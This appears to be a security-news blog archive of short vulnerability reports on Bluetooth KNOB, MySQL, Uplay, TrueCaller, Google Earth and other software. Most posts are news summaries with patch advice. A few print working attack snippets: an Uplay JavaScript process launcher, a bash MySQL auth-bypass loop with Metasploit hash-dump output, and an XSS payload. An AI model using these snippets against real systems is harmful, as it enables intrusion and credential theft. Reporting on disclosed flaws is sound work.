Search This Blog

Showing posts with label Application Vulnerability. Show all posts

Security flaw in Bluetooth-enabled devices






A group of security researchers at the Center for IT-Security, Privacy, and Accountability (CISPA) found a flaw that could affect billions of Bluetooth-enabled devices, which includes smartphones, laptops, smart IoT devices, and other devices.

The experts named the vulnerability as CVE-2019-9506 and they tagged it as a KNOB (Key Negotiation of Bluetooth).

According to the researchers, the flaw in Bluetooth’s authentication protocols enables hackers to compromise the devices and spy on data transmitted between the two devices. The astonishing fact about the flaw is that the hackers could exploit this vulnerability even though the devices had been paired before.

However, the KNOB’s official website, every standard-compliant Bluetooth device could be exploited. “We conducted KNOB attacks on more than 17 unique Bluetooth chips (by attacking 24 different devices). At the time of writing, we were able to test chips from Broadcom, Qualcomm, Apple, Intel, and Chicony manufacturers. All devices that we tested were vulnerable to the KNOB attack,” it reads.

Bluetooth SIG has issued a security notice regarding the vulnerability.

  • Conditions for a successful attack:
  • Both the devices have to be vulnerable
  • Both the devices have to be within the range establishing a BR/EDR connection. If any of the devices are not affected by the vulnerability, the attack wouldn’t work
  • Direct transmissions between devices while pairing has to be blocked
  • Existing connections won’t lead to a successful attack — it has to be done during negotiation or renegotiation of a paired device connection


Bluetooth  SIG has started working on updating a remedy for the flaw. 

Vulnerability in DHCP client let hackers take control of network

A critical remote code execution vulnerability that resides in the DHCP client allows attackers to take control of the system by sending malicious DHCP reply packets.

A Dynamic Host Configuration Protocol (DHCP) Client allows a device to act as a host requesting-configuration parameter, such as an IP address from a DHCP server and the DHCP client can be configured on Ethernet interfaces.

In order to join a client to the network, the packer required to have all the TCP/IP configuration information during DHCP Offer and DHCP Ack.

DHCP protocol works as a client-server model, and it is responsible to dynamically allocate the IP address if the user connects with internet also the DHCP server will be responsible for distributing the IP address to the DHCP client.

This vulnerability will execution the remote code on the system that connected with vulnerable DHCP client that tries to connect with a rogue DHCP server.

Vulnerability Details The remote code execution vulnerability exactly resides in the function of dhcpcore.dll called “DecodeDomainSearchListData” which is responsible for decodes the encoded search list option field value.

During the decoding process, the length of the decoded domain name list will be calculated by the function and allocate the memory and copy the decoded list.

According to McAfee research, A malicious user can create an encoded search list, such that when DecodeDomainSearchListData function decodes, the resulting length is zero. This will lead to heapalloc with zero memory, resulting in an out-of-bound write.

The vulnerability has been patched, and it can be tracked as CVE-2019-0547, The patch includes a check which ensures the size argument to HeapAlloc is not zero. If zero, the function exits.

You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity course online to keep yourself updated.

How the Mackeeper failed to secure Mac


Mackeeper, the program designed to keep Mac computers secure suffers from a critical remote code execution vulnerability.

This flaw lies in the lack of input validation during the handling of custom URLs by the program. It allows hackers to execute arbitrary commands with root privilege with little to no user interaction. It can happen when users visited specially crafted webpages in the Safari browser.

If the user had already provided their password to MacKeeper during normal course of operation of the program, the user will not be alerted for their password prior to the execution of the arbitrary command.

If the user did not previously authenticate, they will be prompted to enter their authentication details, however, the text that appears for the authentication dialogue can be manipulated to appear as anything, so the user might not realize the true consequences of the action.

The vulnerability, quite possibly a zero-day one was discovered by security researcher Braden Thomas who released a demonstration link as proof-of-concept (POC) through which the Mackeeper program was automatically un-installed upon simply clicking the external link. 

Mackeeper is a controversial program amongst the Mac users owing to its pop-up and advertisements, but apparently has 20 million downloads worldwide.

The vulnerability existed even in  the latest version 3.4. The company has advised users to run Mackeeper update tracker and install 3.4.1 or later. For users who have not updated, they can use a browser other than Safari or remove the custom URL scheme handler from Mackeeper's info.plist file.

VMware Patches critical directory traversal vulnerability in its VMware View


VMware has patched a critical directory traversal vulnerability in its View VMWare desktop virtualization platform that could allow a hacker to access arbitrary files from affected View Servers.

The vulnerability affects both the View Connection Server and the View Security Server. The vulnerability was discovered by Digital Defense, a security service provider.

According to VMware advisory, the affected versions are View 5.x prior to 5.1.2 and 4.x prior to 4.6.2. Users are advised to upgrade to the latest version.

Users who are unable to immediately update their View Servers are advised to "Disable security server" or "blocking directory traversal attacks with an intrusion detection/prevention system or an application firewall".

CVE-2012-4170 : Adobe fixes Buffer Overflow Vulnerability in Photoshop


Adobe has released an update to Photoshop CS6 with version 13.0.1. This update closes a critical Remote Buffer overflow vulnerability in the PNG Image Processing.

Francis Provencher has discovered a vulnerability in Adobe Photoshop CS6, which can be exploited by malicious people to compromise a user's system.

According to Secunia advisory, The vulnerability is caused due to a boundary error in the "Standard MultiPlugin.8BF" module when processing a Portable Network Graphics (PNG) image. This can be exploited to cause a heap-based buffer overflow via a specially crafted "tRNS" chunk size.

Successful exploitation may allow execution of arbitrary code, but requires tricking a user into opening a malicious image.

The vulnerability is reported in versions 13.x only for Windows and Macintosh (confirmed in 13.0 20120315.r.428 on Windows).

Users can upgrade to Photoshop CS6 13.0.1 by selecting "Updates" under the Photoshop Help menu; this will launch the Adobe Application Manager, allowing users to select and install the update.

CVE-2012-0681 : Apple fixes Information disclosure vulnerability in Remote Desktop


Apple has released version 3.6.1 of its Apple Remote Desktop application to fix an information disclosure vulnerability.

Vulnerability Details(CVE-2012-0681):
When connecting to a third-party VNC server with "Encrypt all network data" set, data is not encrypted and no warning is produced.

According to Apple security advisory,  This issue does not affect Apple Remote Desktop 3.5.1 and earlier. Versions 3.5.2 up to and including 3.6.0 are affected;

The latest version 3.6.1 address this issue by creating an SSH tunnel for the VNC connection when "Encrypt all network data" is set. If this is not possible, ARD will prevent the connection.

Apple Remote Desktop 3.6.1 may be obtained from Mac App Store,the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/

Prolexic found Vulnerability in Popular Dirt Jumper DDoS toolkit


Security Vendor Prolexic has discovered a critical vulnerability in the popular Dirt Jumper DDoS Toolkit family used  by hackers to launch distributed denial of service attacks against corporate networks.

“DDoS attackers take pride in finding and exploiting weaknesses in the architecture and code of their targets. With this vulnerability report, we’ve turned the tables and exposed crucial weaknesses in their own tools,” said Scott Hammack, CEO at Prolexic.

Prolexic found security holes in the simplest part of the program, namely the GUI control panels used to control bots created by it which turned out to be cobbled together using hastily-coded PHP/MySQL scripts.

"With this information, it is possible to access the C&C server and stop the attack," Prolexic CEO Scott Hammack said in statement. "Part of our mission is to clean up the Internet. It is our duty to share this vulnerability with the security community at large."

CVE-2012-2665: LibreOffice vulnerable to multiple Heap-based buffer overflows


CVE-2012-2665: Few weeks after releasing the LibreOffice 3.5.5, The Document Foundation has confirmed that security holes in earlier versions of the open source LibreOffice .

According to the security advisory,  Multiple heap-based buffer overflow flaws were found in the XML manifest encryption tag parsing code of LibreOffice.

An attacker could create a specially-crafted file in the Open Document Format for Office Applications (ODF) format which when opened could cause arbitrary code execution.

Versions up to and including LibreOffice 3.5.4 are affected; Users are advised to upgrade your software to version 3.5.5 or 3.6.0.

Vulnerability in Ubisoft Uplay allows attacker to gain control of your computer



Google security Researcher ,Tavis Ormandy, has discovered a critical vulnerability in Ubisoft Uplay plugin software that could allow hackers to remotely install programs onto your PC.

It is possible for attackers to use a few lines of JavaScript to persuade the plugin to launch arbitrary processes – the potential victim only needs to open a specially crafted web page.

"While on vacation recently I bought a video game called 'Assassin's Creed Revelations,' he posted on the Full Disclosure mailing list. "I noticed the installation procedure creates a browser plugin for its accompanying Uplay launcher, which grants unexpectedly (at least to me) wide access to websites."

The javascript code that exploits the vulenrability:
var x = document.createElement('OBJECT');

x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
Here is a proof-of-concept page, users can check if their system is vulnerable: the page attempts to start the Windows Calculator.

Ubisoft has fixed a security flaw.

“We have made a forced patch to correct the flaw in the browser plug-in for the Uplay PC application that was brought to our attention earlier today. We recommend that all Uplay users update their Uplay PC application without a Web browser open. This will allow the plug-in to update correctly. An updated version of the Uplay PC installer with the patch also is available from Uplay.com."Ubisoft statement reads.

"Ubisoft takes security issues very seriously, and we will continue to monitor all reports of vulnerabilities within our software and take swift action to resolve such issues.”

Yahoo! app vulnerability could be behind 'Android botnet'



Earlier this month, Microsoft Engineer ,Terry Zink said he discovered spam was being sent from compromised Yahoo accounts from what looked like an international Android spam botnet.

He stated that the messages all come from Yahoo Mail servers. They are all from compromised Yahoo accounts. They are sending all stock spam, the typical pump and dump variety that we’ve seen for years.  Furthermore, they all have the 'Sent from Yahoo! Mail on Android' text at the bottom of their spam.


Google, however, refuted that the spam were sent from an Android botnet, stating that the spammers behind this may have used infected PCs and fake mobile signature in an attempt to bypass email filters.

Security Researchers at Lookout have identified a security hole in the Yahoo! Mail app for Android, which they believed to be responsible for the so-called mobile spam botnet. Today, Trend Micro experts have confirmed the existence of the vulnerability.

They couldn’t precisely say if the vulnerability is in fact responsible for the spam sent out from mobile phones, but the fact that they independently appoint the same weakness as a possible cause makes this scenario even more plausible.


The vulnerability discovered by the researchers allow an attacker to gain access to a user’s Yahoo! Mail cookie.

This bug stems from the communication between Yahoo! mail server and Yahoo! Android mail client. By gaining this cookie, the attacker can use the compromised Yahoo! Mail account to send specially-crafted messages. The said bug also enables an attacker to gain access to user’s inbox and messages.

A critical Security vulnerability in MySQL/MariaDB [CVE-2012-2122]


Security researchers reveal the existence of a serious security vulnerability in MariaDB and MySQL that enables an attacker to gain root access to the database server.Th vulnerability has been assigned to CVE-2012-2122 id;

According to Sergei Golubchik, security coordinator at MariaDB, the flaw doesn’t affect official vendor binaries, but it does expose the customers of MariaDB and MySQL who use versions such as 5.1.61, 5.2.11, 5.3.5, 5.5.22 and prior.


This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied.

The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Caveats and Defense

The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.


If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the "bind-address" parameter to "127.0.0.1". Restart the MySQL service to apply this setting.

Exploit Module for PenTesters:
This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.


$ msfconsole

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root

msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

msf auxiliary(mysql_authbypass_hashdump) > run



[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test

[*] 127.0.0.1:3306 Authentication bypass is 10% complete

[*] 127.0.0.1:3306 Authentication bypass is 20% complete

[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts

[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89

[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Reference:
Rapid7

TrueCaller Vulnerability Allows Changing Users Details

A security Researcher Ali AlHabshi,from Kuwait WhiteHat, has discovered a vulnerability in TrueCaller iPhone App that allows hackers to change user details.

He report about the vulnerability to True  Software.  True Software confirmed the vulnerability and released new version '2.78' of TrueCaller to fix the vulnerability.

The Vulnerability Details:
 The application allows users to search numbers if and only if the user enables Enhanced Search feature. When enabled, the user is warned that his contacts will be shared with other users to search and his address book is sent to TrueCaller database.

 This process is done by sending the following HTTP “cleartext” request:
post_contact_data=[{"REV":"","FN":"ContactName","TEL_CELL":["MobileNumber"],”TCBID”:”Number“,”FID”:”Number“,”TEL_WORK”:[Number],”TEL_HOME”:[],”CONTACT_ID”:”3619″,”LID”:”"}

From a security point of view, this is a bad security behavior and may lead to one of the following situations:

Privacy Issues
Although TrueCaller has a strict privacy policy, this behavior allows 3rd parties (i.e. ISP’s, Governments, Sniffers..etc) to intercept database entries and build a copy of TrueCaller’s database.

Fake Data
The “cleartext“, unencrypted POST request may be leveraged to fake/change/modify address book entries by repeating the POST request with fake entries in the parameter and fill TrueCaller’s database with fake (rogue) entries.

Here’s an example of the an intercepted request after enabling Enhanced Search feature:


Enabling Enhanced Search features without having to share user’s Address Book:
When the user enables “Enhanced Search”, the application sends an encrypted HTTP GET request, followed by the HTTP POST request outlined above. If a malicious user allows the GET request to pass and “drops” the following POST request (which contains his address book), he will be able to enjoy the Enhanced Search feature without sharing his address book, which TrueCaller really do not want to happen.

Advisory Timeline
28/Apr/2012 – First contact: Vulnerability details sent
29/Apr/2012 – Response received: Asked for more details
29/Apr/2012 – Second Contact: More details provided and cleared TrueCaller doubts
30/Apr/2012 – Vulnerability Confirmed: TrueCaller started working on a fix
01/May/2012 – Vulnerability Fixed: Fix submitted to Apple for approval
17/May/2012 – New Version Released: Fix approved by Apple and released
01/Jun/2012 - Vulnerability Released.

Vulnerability in TreasonSMS allows hackers to run malicious code in iPhone


Vulnerability-lab researchers discovered HTML Inject & File Include Vulnerability in the TreasonSMS app that allows hackers to run the malicious code inside the iPhone.

About TreasonSMS app:
TreasonSMS allows you to send SMS from your desktop computer. It turns your iPhone into a SMS webserver, so you can send sms and reply to SMS from your computer over wifi.

According to the security advisory provided by researchers, the vulnerability allows an remote attacker to include malicious persistent script codes on application-side of the iphone.

This possible way allows the attacker also to inject for example webshell scripts to get control of the affected application folder. When the IPhone is jailbreaked the vulnerability exploitation can also result full controll of the affected IPhone.

"The Bug is located in the input fields of the Message Sending & Message Output. An attacker can scan the victim on walkthrough because the ip of the webserver makes the treasonSMS available to anybody without password.To exploit somebody on a walkthourgh its only required to scan for the stable ip via wlan and access the panel for exploitation." Researcher said.

The vulnerability-Lab estimated the vulnerability as High Severity.

Vulnerability in Facebook app for Android & iOS leads to Identity theft


A new security vulnerability in Facebook application for Android and iOS allows an attacker to steal your Facebook identity.

Gareth Wright,a UK-based app developer for android and iOS has identified a security vulnerability in Facebook mobile application. The problem is that Facebook app doesn't encrypt your login credentials ,leaving them accessible to other malicious apps or USB connections.

He explained the about the hack in this blog post.

Facebook responded this vulnerability discover by issuing the following statement:
"Facebook’s iOS and Android applications are only intended for use with the manufacturer provided operating system, and access tokens are only vulnerable if they have modified their mobile OS (i.e. jailbroken iOS or modded Android) or have granted a malicious actor access to the physical device.

"We develop and test our application on an unmodified version of mobile operating systems and rely on the native protections as a foundation for development, deployment and security, all of which is compromised on a jailbroken device."
This statement appears to indicate that it is only for jailbroken devices; TheNextWeb(TNW) says it is untrue, "Your Facebook app on iOS is absolutely vulnerable because using a tool like iExplore, which is what Wright used to perform his white label hack, does not require a jailbreak."

Researchers also discovered that popular file-syncing app Dropbox also exhibits the vulnerability.

Code Execution vulnerability in Google Earth found by longrifle0x


A code Execution vulnerability in Google Earth application was identified by Security Researcher Ucha Gobejishvili (also known as longrifle0x). The researcher demonstrated the attack in his own blog.

The PlaceMark field in the app is found to be vulnerable and allows an attacker to run javascript code. Hacker demonstrated the attack by inserting the following code:
<A HREF="javascript:document.location='http://www.secday.blogspot.com/'">XSS</A><marquee>Georgia</marquee>
The above tag will execute the script and load the secday.blogspot.com.

GOM Media Player v. 2.1.37 vulnerable to Buffer Overflow Attack

Security Researcher Ucha Gobejishvili (longrifle0x),Vulnerability Lab, discovered Buffer overflow vulnerability in the GOM Media player application. Version 2.1.37 found to be vulnerable to this attack.

Buffer overflow:
         An app is said to be vulnerable to when it allows attackers to store the the data in a buffer beyond the size allocated for it. By successfully exploiting the vulnerability, an attacker can run an arbitrary code.
Researcher claimed the vulnerability can exploited by local and remote attackers. Researcher estimated this vulnerability risk as high.

POC:
1) Download & open the software client
2) Click open ==> Url..
3) Put vulnerability code
4) now you will see result

The video that demonstrate the vulnerability:

Google Wallet's PIN System can be easily cracked from rooted devices

Joshua Rubin, a security researcher at zvelo, have discovered that Google Wallet PIN can be cracked easily by brute forcing on a device that is "rooted".

Google Wallet is the first publicly available Near Field Communication (NFC) Payment System that purports to turn to your smartphone into a credit card, allows to purchase by entering a PIN .

In order to facilitate secure transactions,  NFC use hardware component called Secure Element(SE) which is used to store your confidential data such as the complete credit card number.

In order to authenticate users and grant access to the SE, Google Wallet requires a 4-digit, numeric PIN when first launching the app. Unfortunately, the PIN is not stored on the SE , but instead it is stored as a salted SHA256 Hash on the device itself.
"Knowing that the PIN can only be a 4-digit numeric value, it dawned on us that a brute-force attack would only require calculating, at most, 10,000 SHA256 hashes."Joshua Rubin said ." This is trivial even on a platform as limited as a smartphone. Proving this hypothesis took little time."

Google Wallet only allows five invalid PIN entry attempts before locking the user out,but with root access you can bruteforce the PIN without a single invalid attempt.

Rubin concludes that the only way to solve this issue would be to move the PIN verification into the SE itself and to no longer store the PIN hash and salt outside the SE.


Google has issued this statement on the matter:
The Zvelo study was conducted on their own phone on which they disabled the security mechanisms that protect Google Wallet by rooting the device. To date, there is no known vulnerability that enables someone to take a consumer phone and gain root access while preserving any Wallet information such as the PIN.

This confirms that there should be no issue unless your phone has already been rooted. If you have rooted your smartphone, Google strongly encourage you to not install Google Wallet and to always set up a screen lock as an additional layer of security for their phone.(like activating the lock screen, disabling the USB debugging option in settings, and enabling full-disk encryption).

Forensics Vendor Passware warns Mac OS X FileVault 2 easily decrypted

Passware, Inc., a provider of password recovery for law enforcement, issued a warning that its Forensic Tools capable of breaking the Disk encryption security in Mac OS.

FileVault provides 128bit AES encryption of all files located within your home directory of Mac OS X. A master password (and recovery key in 10.7+) is created as a precaution against a user losing their password.

Passware Kit Forensic v11.3: can decrypt the a FileVault-encrypted Mac disk within 40 minutes-regardless of the length or complexity of the password. Passware says its utilities can now easily gain a FileVault encryption key from the target computer memory, which provides full access to the encrypted Mac hard disk.


“Full disk encryption is becoming a major obstacle for digital investigations,” said Dmitry Sumin, president, Passware, Inc. “The latest version of Passware Kit Forensic offers multiple approaches to overcoming this problem, such as live memory analysis and extraction of encryption keys for BitLocker, TrueCrypt, and FileVault. This means forensic experts are better armed to approach investigative
challenges with an effective and efficient solution that significantly reduces decryption time and thus allows investigators to focus on data analysis."

Passware Kit Forensic is available directly from Passware for $995 with one year of free updates. PassWare makes this software primarily available for law enforcement.

Chrome v16.0.912.77 patched the Critical Vulnerabilities


Google released updated Chrome version 16.0.912.77 to fix the several critical vulnerabilities including critical vulnerability Use-after-free in Safe Browsing navigation.  The update addresses a total of four vulnerabilities, all of which are rated as "high severity".

The List of Vulnerability patched in updated version:
  • [$1000] [106484] High CVE-2011-3924: Use-after-free in DOM selections. Credit to Arthur Gerkis.
  • [$3133.7] [107182] Critical CVE-2011-3925: Use-after-free in Safe Browsing navigation. Credit to Chamal de Silva. *
  • [108461] High CVE-2011-3928: Use-after-free in DOM handling. Credit to wushi of team509 reported through ZDI (ZDI-CAN-1415).
  • [$1000] [108605] High CVE-2011-3927: Uninitialized value in Skia. Credit to miaubiz.
  • [$1000] [109556] High CVE-2011-3926: Heap-buffer-overflow in tree builder. Credit to Arthur Gerkis.

Multiple Vulnerabilities found in Tor, allows a remote Hacking


TOR, an implementation of second generation Onion Routing, vulnerable to multiple vulnerabilities .  The critical one of which may allows a remote attacker to execute arbitrary code.

A remote attacker could possibly execute arbitrary code or cause a Denial of Service by exploiting the vulnerability. Furthermore, a remote relay the user is directly connected to may be able to disclose anonymous information about that user or enumerate bridges in the user's connection.

According to the Gentoo Linux Advisory, the following vulnerabilities have been found in TOR:
  • When configured as client or bridge, Tor uses the same TLS certificate chain for all outgoing connections (CVE-2011-2768).
  • When configured as a bridge, Tor relays can distinguish incoming bridge connections from client connections (CVE-2011-2769).
  • An error in or/buffers.c could result in a heap-based buffer overflow (CVE-2011-2778).
Researchers recommends TOR users to upgrade to latest version (0.2.2.35)